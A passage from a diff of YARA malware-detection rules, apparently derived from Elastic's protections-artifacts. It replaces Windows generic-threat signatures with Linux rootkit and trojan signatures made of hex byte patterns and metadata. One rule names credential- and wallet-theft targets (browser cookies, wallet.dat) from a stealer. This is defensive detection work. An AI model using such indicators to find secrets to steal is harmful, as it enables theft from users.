"https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1ca6ed610479b5aaaf193a2afed8f2ca1e32c0c5550a195d88f689caab60c6fb" - logic_hash = "4f3a0b2e45ae4e6a00f137798b700a0925fa6eb19ea6b871d7eeb565548888ba" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Raccoon.yar#L42-L63" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f7b1aaae018d5287444990606fc43a0f2deb4ac0c7b2712cc28331781d43ae27" + logic_hash = "94f70c60ed4fab021e013cf6a632321e0e1bdeef25a48a598d9e7388e7e445ca" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "cd81b61929b18d59630814718443c4b158f9dcc89c7d03a46a531ffc5843f585" - severity = 50 + fingerprint = "17c34b5b9a0211255a93f9662857361680e72a45135d6ea9b5af8d77b54583b9" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 51 51 31 33 37 32 33 39 32 34 38 20 } - $a2 = { 74 65 6E 63 65 6E 74 3A 2F 2F 6D 65 73 73 61 67 65 2F 3F 75 69 6E 3D 31 33 37 32 33 39 32 34 38 26 53 69 74 65 3D 63 66 } + $a1 = "\\ffcookies.txt" wide fullword + $a2 = "wallet.dat" wide fullword + $a3 = "0Network\\Cookies" wide fullword + $a4 = "Wn0nlDEXjIzjLlkEHYxNvTAXHXRteWg0ieGKVyD52CvONbW7G91RvQDwSZi/N2ISm4xEWRKYJwjnYUGS9OZmj/TAie8jG07EXEcO8D7h2m2lGzWnFG31R1rsxG1+G8E=" condition: all of them } -rule ELASTIC_Windows_Generic_Threat_F7D3Cdfd : FILE MEMORY +rule ELASTIC_Linux_Rootkit_Dakkatoni_010D3Ac2 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Rootkit Dakkatoni (Linux.Rootkit.Dakkatoni)" author = "Elastic Security" - id = "f7d3cdfd-72eb-4298-b3ff-432f5c4347c9" - date = "2024-01-07" - modified = "2024-01-12" + id = "010d3ac2-0bb2-4966-bf5f-fd040ba07311" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L733-L751" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f9df83d0b0e06884cdb4a02cd2091ee1fadeabb2ea16ca34cbfef4129ede251f" - logic_hash = "23e1008f222eb94a4bd34372834924377e813dc76efa8544b0dcbe7d3e3addde" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Rootkit_Dakkatoni.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "38b2d033eb5ce87faa4faa7fcac943d9373e432e0d45e741a0c01d714ee9d4d3" + logic_hash = "51119321f29aed695e09da22d3234eae96db93e8029d4525d018e56c7131f7b8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "db703a2ddcec989a81b99a67e61f4be34a2b0e55285c2bdec91cd2f7fc7e52f3" - severity = 50 + fingerprint = "2c7935079dc971d2b8a64c512ad677e946ff45f7f1d1b62c3ca011ebde82f13b" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 51 51 56 57 E8 A3 D0 FF FF 83 78 68 00 74 21 FF 75 24 FF 75 20 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 E5 8C FF FF 83 C4 1C 85 C0 75 73 8B 7D 1C 8D 45 F8 50 8D 45 FC 50 57 FF } + $a = { 89 C8 C1 E0 0D 31 C1 89 CE 83 E6 03 83 C6 05 89 C8 31 D2 C1 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_0350Ed31 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Generic_402Be6C5 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" author = "Elastic Security" - id = "0350ed31-ed07-4e9a-8488-3765c990f25c" - date = "2024-01-07" - modified = "2024-01-12" + id = "402be6c5-a1d8-4d7a-88ba-b852e0db1098" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L753-L771" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "008f9352765d1b3360726363e3e179b527a566bc59acecea06bd16eb16b66c5d" - logic_hash = "149dd26466f47b2e7f514bdcc9822470334490da2898840f35fe6b537ce104f6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Generic.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d30a8f5971763831f92d9a6dd4720f52a1638054672a74fdb59357ae1c9e6deb" + logic_hash = "b32111972bc21822f0f2c8e47198c90b70e78667410175257b9542c212fc3a1d" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "aac41abf60a16c02c6250c0468c6f707f9771b48da9e78633de7141d09ca23c8" - severity = 50 + fingerprint = "1e906f5a06f688084edf537ead0b7e887bd9e0fcc39990c976ea8c136dc52624" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 35 6A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 3F } + $a = { C0 52 4C 95 42 11 01 64 E9 D7 39 E4 89 34 FA 48 01 02 C1 3B 39 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_A1Cef0Cd : FILE MEMORY +rule ELASTIC_Linux_Trojan_Generic_5420D3E7 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" author = "Elastic Security" - id = "a1cef0cd-a811-4d7b-b24e-7935c0418c7a" - date = "2024-01-08" - modified = "2024-01-12" + id = "5420d3e7-012f-4ce0-bb13-9e5221efa73e" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L773-L791" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "71f519c6bd598e17e1298d247a4ad37b78685ca6fd423d560d397d34d16b7db8" - logic_hash = "2772906e3a8a088e7c6ea1370af5e5bbe2cbae4f49de9b939524e317be8ddde4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Generic.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "103b8fced0aebd73cb8ba9eff1a55e6b6fa13bb0a099c9234521f298ee8d2f9f" + logic_hash = "8ba3566ec900e37f05f11d40c65ffe1dfc587c553fa9c28b71ced7a9a90f50c3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9285f0ea8ed0ceded2f3876ef197b67e8087f7de82a72e0cd9899b05015eee79" - severity = 50 + fingerprint = "e81615b5756c2789b9be8fb10420461d5260914e16ba320cbab552d654bbbd8a" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 51 53 8B DA 89 45 FC 8B 45 FC E8 76 00 00 00 33 C0 55 68 F0 A0 41 00 64 FF 30 64 89 20 8B 45 FC 80 78 20 01 74 10 8B 45 FC 8B 40 04 8B D3 E8 CE FC FF FF 40 75 0F 8B 45 FC 8B 40 04 8B } + $a = { 63 00 5F 5A 4E 34 41 52 43 34 37 65 6E 63 72 79 70 74 45 50 63 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_E5F4703F : FILE MEMORY +rule ELASTIC_Linux_Trojan_Generic_4F4Cc3Ea : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" author = "Elastic Security" - id = "e5f4703f-e834-4904-9036-a8c5996058c8" - date = "2024-01-09" - modified = "2024-01-12" + id = "4f4cc3ea-a906-4fce-a482-d762ab8995b8" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L793-L811" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "362bda1fad3fefce7d173617909d3c1a0a8e234e22caf3215ee7c6cef6b2743b" - logic_hash = "f81476d5e5a9bcb42b32d6ec3d4b620165f2878c50691ecf59ef6f34b6ad9d1b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Generic.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "32e25641360dbfd50125c43754cd327cf024f1b3bfd75b617cdf8a17024e2da5" + logic_hash = "9eb0d93b8c1a579ca8362d033edecbbe6a9ade82f6ae5688c183b97ed7b97faa" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "3072ea028b0716e88820782a2658d1f424d57bd988ccfcc1581991649cf52b19" - severity = 50 + fingerprint = "d85dac2bd81925f5d8c90c11047c631c1046767cb6649cd266c3a143353b6c12" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 E4 F8 83 EC 08 83 79 14 08 56 57 8B F1 72 02 8B 31 8B 41 10 8B CE 8D 3C 46 8B D7 E8 AC FA FF FF 8B 75 08 2B F8 D1 FF 0F 57 C0 57 50 0F 11 06 8B CE C7 46 10 00 00 00 00 C7 46 14 00 } + $a = { 4A 4E 49 20 55 4E 50 41 43 4B 20 44 45 58 20 53 54 41 52 54 20 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_8B790Aba : FILE MEMORY +rule ELASTIC_Linux_Trojan_Generic_703A0258 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" author = "Elastic Security" - id = "8b790aba-02b4-4c71-a51e-3a56ea5728ec" - date = "2024-01-09" - modified = "2024-01-12" + id = "703a0258-8d28-483e-a679-21d9ef1917b4" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L813-L832" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ec98bfff01d384bdff6bbbc5e17620b31fa57c662516157fd476ef587b8d239e" - logic_hash = "8a0b2af3d0c95466ca138dfcc3d6f6a702ec92f5cd4f791b1200c79ffd973840" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Generic.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b086d0119042fc960fe540c23d0a274dd0fb6f3570607823895c9158d4f75974" + logic_hash = "cb37930637b8da91188d199ee20f1b64a0b1f13e966a99e69b983e623dac51de" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "8581397f15b9985bafa5248f0e7f044bf80c82e441d2216dc0976c806f658d2e" - severity = 50 + fingerprint = "796c2283eb14057081409800480b74ab684413f8f63a9db8704f5057026fb556" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 7A 66 62 50 4A 64 73 72 78 77 7B 7B 79 55 36 46 42 50 4A 3F 20 2E 6E 3E 36 65 73 7A } - $a2 = { 50 36 7B 77 64 71 79 64 46 4A 73 64 79 62 45 7A 77 63 62 64 } + $a = { C2 F7 89 76 7E 86 87 F6 2B A3 2C 94 61 36 BE B6 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_76A7579F : FILE MEMORY +rule ELASTIC_Linux_Trojan_Generic_378765E4 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" author = "Elastic Security" - id = "76a7579f-4a9b-4dae-935c-14d829d3c416" - date = "2024-01-09" - modified = "2024-01-12" + id = "378765e4-c0f2-42ad-a42b-b992d3b866f4" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L834-L852" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "76c73934bcff7e4ee08b068d1e02b8f5c22161262d127de2b4ac2e81d09d84f6" - logic_hash = "08ed2d318e7154195911aaf3705626307b48a54aa195eaa054ec53766d3e198d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Generic.yar#L81-L99" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1ed42910e09e88777ae9958439d14176cb77271edf110053e1a29372fce21ec1" + logic_hash = "dd10305f553fa94ff83fafa84cff3d544f097b617fca20760eef838902e1f7db" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ba5bfc0e012a22172f138c498560a606e6754efa0fa145799f00725e130ad90f" - severity = 50 + fingerprint = "60f259ba5ffe607b594c2744b9b30c35beab9683f4cd83c2e31556a387138923" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 8B 55 10 8B 45 08 8B C8 85 D2 74 09 C6 01 00 41 83 EA 01 75 F7 5D C3 55 8B EC 64 A1 30 00 00 00 83 EC 18 8B 40 0C 53 56 57 8B 78 0C E9 A7 00 00 00 8B 47 30 33 F6 8B 5F 2C 8B 3F 89 45 } + $a = { E8 ?? FB FF FF 83 7D D4 00 79 0A B8 ?? 22 60 00 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_3F060B9C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Generic_F657Fb4F : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" author = "Elastic Security" - id = "3f060b9c-8c35-4f0f-9dfd-10be6355bea9" - date = "2024-01-10" - modified = "2024-01-12" + id = "f657fb4f-a065-4d51-bead-fd28f8053418" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L854-L872" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "32e7a40b13ddbf9fc73bd12c234336b1ae11e2f39476de99ebacd7bbfd22fba0" - logic_hash = "193583f63f22452f96c8372fdc9ef04e2a684f847564a7fe75145ea30d426901" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Generic.yar#L101-L119" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1ed42910e09e88777ae9958439d14176cb77271edf110053e1a29372fce21ec1" + logic_hash = "af4fa2c21b47f360b425ebbfea624e3728cd682e54e367d265b4f3a6515b0720" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5bc1d19faa8fc07ef669f6f63baceee5fe452c0e2d54d6154bcc01e11606ae6f" - severity = 50 + fingerprint = "8c15d5e53b95002f569d63c91db7858c4ca8f26c441cb348a1b34f3b26d02468" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 51 51 53 56 8B F1 E8 4B BE FF FF 8D 45 FC 8B CE 50 FF 75 10 FF 75 0C E8 69 FE FF FF 8B D8 8B CE 53 E8 4B FD FF FF 85 C0 0F 84 C6 00 00 00 8B 46 40 83 F8 02 0F 84 B3 00 00 00 83 F8 05 } + $a = { E8 ?? FB FF FF 83 7D D4 00 79 0A B8 ?? ?? 60 00 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Dbae6542 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Generic_Be1757Ef : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" author = "Elastic Security" - id = "dbae6542-b343-4320-884c-c0ce97a431f1" - date = "2024-01-10" - modified = "2024-01-12" + id = "be1757ef-cf45-4c00-8d6c-dbb0f44f6efb" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L874-L892" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c73f533f96ed894b9ff717da195083a594673e218ee9a269e360353b9c9a0283" - logic_hash = "673c6b4e6aaa127d45b21d0283437000fbc507a84ecd7a326448869d63759aee" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Generic.yar#L121-L139" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f3e4e2b5af9d0c72aae83cec57e5c091a95c549f826e8f13559aaf7d300f6e13" + logic_hash = "567d33c262e5f812c6a702bcc0a1f0cf576b67bf7cf67bb82b5f9ce9f233aaff" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "880aafd423494eccab31342bdfec392fdf4a7b4d98614a0c3b5302d62bcf5ba8" - severity = 50 + fingerprint = "0af6b01197b63259d9ecbc24f95b183abe7c60e3bf37ca6ac1b9bc25696aae77" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 28 00 00 0A 20 B8 0B 00 00 20 10 27 00 00 6F 29 00 00 0A 28 1F 00 00 0A 7E 0F 00 00 04 2D 0A 28 27 00 00 06 28 19 00 00 06 7E 15 00 00 04 6F 2A 00 00 0A 26 17 2D C8 2A EE 16 80 0F 00 00 04 14 } + $a = { 20 54 68 75 20 4D 61 72 20 31 20 31 34 3A 34 34 3A 30 38 20 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_808F680E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Generic_7A95Ef79 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" author = "Elastic Security" - id = "808f680e-db35-488f-b942-79213890b336" - date = "2024-01-10" - modified = "2024-01-12" + id = "7a95ef79-3df5-4f7a-a8ba-00577473b288" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L894-L912" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "df6955522532e365239b94e9d834ff5eeeb354eec3e3672c48be88725849ac1c" - logic_hash = "22d91a87c01b401d4a203fbabb93a9b45fd6d8819125c56d9c427449b06d2f84" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Generic.yar#L141-L159" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f59340a740af8f7f4b96e3ea46d38dbe81f2b776820b6f53b7028119c5db4355" + logic_hash = "6da43e4bab6b2024b49dfc943f099fb21c06d8d4a082a05594b07cb55989183c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4b4b3b244d0168b11a8df4805f9043c6e4039ced332a7ba9c9d0d962ad6f6a0e" - severity = 50 + fingerprint = "aadec0fa964f94afb725a568dacf21e80b80d359cc5dfdd8d028aaece04c7012" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 28 00 00 0A 20 00 00 00 00 FE 01 2A 13 30 02 00 6C 00 00 00 01 00 00 11 20 00 00 00 00 FE 0E 00 00 38 54 00 00 00 00 FE 0C 00 00 20 01 00 00 00 FE 01 39 12 00 00 00 FE 09 01 00 FE 09 02 00 51 } + $a = { 1C 8B 54 24 20 8B 74 24 24 CD 80 5E 5A 59 5B C3 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_073909Cf : FILE MEMORY +rule ELASTIC_Linux_Trojan_Generic_1C5E42B7 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" author = "Elastic Security" - id = "073909cf-7e0d-48fa-a631-e1b641040570" - date = "2024-01-10" - modified = "2024-01-12" + id = "1c5e42b7-b873-443e-a30c-66a75fc39b21" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L914-L932" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "89a6dc518c119b39252889632bd18d9dfdae687f7621310fb14b684d2f85dad8" - logic_hash = "5b42a74010549c884ff85a67b9add6b82a8109a953473cc1439581976f8f545e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Generic.yar#L161-L179" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f" + logic_hash = "cd759b87a303fafb9461d0a73b6a6b3f468b1f3db0189ba0e584a629e5d78da1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "717da3b409c002ff6c6428690faf6e6018daedfaf9ec95b6fb9884cacc27dc20" - severity = 50 + fingerprint = "b64284e1220ec9abc9b233e513020f8b486c76f91e4c3f2a0a6fb003330c2535" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 C4 F0 53 56 89 55 FC 8B F0 8B 45 FC E8 CF E5 FF FF 33 C0 55 68 F2 39 40 00 64 FF 30 64 89 20 33 DB 68 04 3A 40 00 68 0C 3A 40 00 E8 70 FC FF FF 50 E8 82 FC FF FF 89 45 F8 68 18 3A } + $a = { 89 C0 89 45 F4 83 7D F4 FF 75 1C 83 EC 0C 68 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_820Fe9C9 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Generic_8Ca4B663 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" author = "Elastic Security" - id = "820fe9c9-2abc-4dd5-84e2-a74fbded4dc6" - date = "2024-01-11" - modified = "2024-02-08" + id = "8ca4b663-b282-4322-833a-4c0143f63634" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L934-L952" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1102a499b8a863bdbfd978a1d17270990e6b7fe60ce54b9dd17492234aad2f8c" - logic_hash = "81a1359bd5781e1eefb6ae06c6b2ad9e94cc6318c1f81f84c06f0b236b6e84d1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Generic.yar#L181-L199" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1ddf479e504867dfa27a2f23809e6255089fa0e2e7dcf31b6ce7d08f8d88947e" + logic_hash = "43b8cae2075f55a98b226f865d54e1c96345db0564815d849b3458d3f3ffee7f" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "e43f4fee9e23233bf8597decac79bda4790b5682f5e0fe86e3a13cb18724ea3e" - severity = 50 + fingerprint = "34e04e32ee493643cc37ff0cfb94dcbc91202f651bc2560e9c259b53a9d6acfc" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 2E 2A 73 74 72 75 63 74 20 7B 20 46 20 75 69 6E 74 70 74 72 3B 20 58 30 20 63 68 61 6E 20 73 74 72 69 6E 67 3B 20 58 31 20 62 6F 6F 6C 20 7D } + $a = { 28 60 DF F2 FB B7 E7 EB 96 D1 E6 96 88 12 96 EB 8C 94 EB C7 4E } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_89Efd1B4 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Generic_D3Fe3Fae : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Generic (Linux.Trojan.Generic)" author = "Elastic Security" - id = "89efd1b4-9a4b-4749-8b34-630883d2d45b" - date = "2024-01-11" - modified = "2024-02-08" + id = "d3fe3fae-f7ec-48d5-8b17-9ab11a5b689f" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L954-L972" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "937c8bc3c89bb9c05b2cb859c4bf0f47020917a309bbadca36236434c8cdc8b9" - logic_hash = "49a7875fd9c31c5c9b593aed75a28fadb586294422b75c7a8eeba2e8ff254753" - score = 75 - quality = 75 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Generic.yar#L201-L219" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2a2542142adb05bff753e0652e119c1d49232d61c49134f13192425653332dc3" + logic_hash = "0b980a0bcf8340410fe2b53d109f629c6e871ebe82af467153d7b50b73fd8644" + score = 60 + quality = 43 tags = "FILE, MEMORY" - fingerprint = "659bdc9af01212de3d2492e0805e801b0a00630bd699360be15d3fe5b221f6b3" - severity = 50 + fingerprint = "1773a3e22cb44fe0b3e68d343a92939a955027e735c60b48cf3b7312ce3a6415" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 48 81 EC E0 01 00 00 48 89 9C 24 F8 01 00 00 48 83 F9 42 0F 85 03 01 00 00 48 89 84 24 F0 01 00 00 48 89 9C 